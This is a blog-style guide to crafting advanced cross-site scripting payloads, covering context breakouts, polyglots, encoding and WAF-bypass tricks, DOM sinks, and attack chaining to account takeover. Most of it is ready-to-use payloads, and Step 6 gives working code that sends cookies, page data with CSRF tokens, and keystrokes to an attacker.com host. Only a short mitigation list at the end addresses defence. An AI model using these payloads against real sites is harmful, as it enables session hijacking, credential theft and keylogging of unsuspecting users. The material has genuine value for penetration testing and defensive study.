Post cover image
Advanced XSS Payload Crafting

May 4, 2026

Beyond alert(1): Advanced XSS Payload Crafting, Filter Bypasses & Attack Chaining

Introduction

By Praveen Kavinda

1 min read

Most write-ups stop at alert(1).

That's not exploitation — that's signal.

Real-world XSS is about:

  • Context-aware payload crafting
  • Filter/WAF bypassing
  • Execution reliability
  • Attack chaining → account takeover

This guide focuses on how to think and build payloads, not just copy them.

Step 1 — Identify the Execution Context

Before crafting payloads, determine where your input lands:

1. HTML Context

<div>USER_INPUT</div>

2. Attribute Context

<input value="USER_INPUT">

3. JavaScript Context

var data = "USER_INPUT";

4. DOM-Based (client-side sinks)

element.innerHTML = location.hash;

Your payload depends entirely on this.

⚙️ Step 2 — Payload Crafting Fundamentals

Breaking Out of Contexts

HTML:

<script>alert(1)</script>

Attribute:

" onmouseover=alert(1) x="

JavaScript:

";alert(1);//

Goal: escape → inject → execute

Step 3 — Advanced Payload Techniques

1. Polyglot Payloads (multi-context execution)

"><svg/onload=alert(1)>

Works in:

  • HTML
  • Attribute
  • Some JS contexts

2. Event Handler Abuse (stealth execution)

<img src=x onerror=alert(1)>

Advanced:

<svg><animate onbegin=alert(1) attributeName=x></svg>

3. JavaScript Constructors (bypass filters)

[]["constructor"]["constructor"]("alert(1)")()

Useful when:

  • alert blocked

4. No-Parenthesis Execution

onerror=alert;throw 1

Bypasses filters blocking ().

5. Encoded Payloads (WAF bypass)

URL Encoding:

%3Cscript%3Ealert(1)%3C/script%3E

Double Encoding:

%253Cscript%253Ealert(1)%253C/script%253E

Unicode:

<script>alert`\u0031`</script>

6. Case & Tag Obfuscation

<ScRiPt>alert(1)</ScRiPt>
<scr<script>ipt>alert(1)</scr</script>ipt>

Step 4 — DOM-Based XSS (Where Real Bugs Hide)

Common Sources:

location.href
location.hash
document.cookie

Dangerous Sinks:

innerHTML
document.write
eval()

Example:

element.innerHTML = location.hash;

Exploit:

#<img src=x onerror=alert(1)>

Executes without server interaction.

Step 5 — WAF & Filter Bypass Strategy

Strategy mindset:

  • Break signatures
  • Avoid keywords
  • Use browser parsing quirks

Example bypass:

Blocked:

<script>alert(1)</script>

Bypass:

<svg/onload=alert(1)>

Blocked:

alert(1)

Bypass:

confirm(1)
prompt(1)
Blocked <script>:
<iframe src=javascript:alert(1)>

Step 6 — From XSS to Account Takeover

Cookie Exfiltration

fetch("https://attacker.com/steal?c="+document.cookie)

Session Hijacking Flow

  1. Inject payload
  2. Victim loads page
  3. Cookie sent to attacker
  4. Replay session

CSRF Token Theft

fetch('/profile')
.then(r=>r.text())
.then(d=>{
fetch('https://attacker.com/log?data='+btoa(d))
})

Keylogging Payload (stealth)

document.onkeypress = e => {
fetch("https://attacker.com?k="+e.key)
}

Step 7 — Attack Chaining (HIGH IMPACT)

Example:

Stored XSS

Steal admin session

Access admin panel

Modify users / dump data

OR:

DOM XSS

Extract API token

Call privileged endpoints

Privilege escalation

Real Testing Workflow

  1. Identify input points
  2. Determine context
  3. Craft breakout payload
  4. Test encoded/obfuscated variants
  5. Confirm execution
  6. Build post-exploitation payload
  7. Chain with other vulnerabilities

Mitigation (Defensive View)

  • Output encoding (context-aware)
  • CSP (Content Security Policy)
  • Avoid dangerous sinks (innerHTML)
  • Use frameworks with auto-escaping
  • Sanitize user input properly

Key Takeaways

  • XSS is not about alert(1)
  • Payloads must be context-aware
  • Filters can always be bypassed with creativity
  • Real impact = data exfiltration + account takeover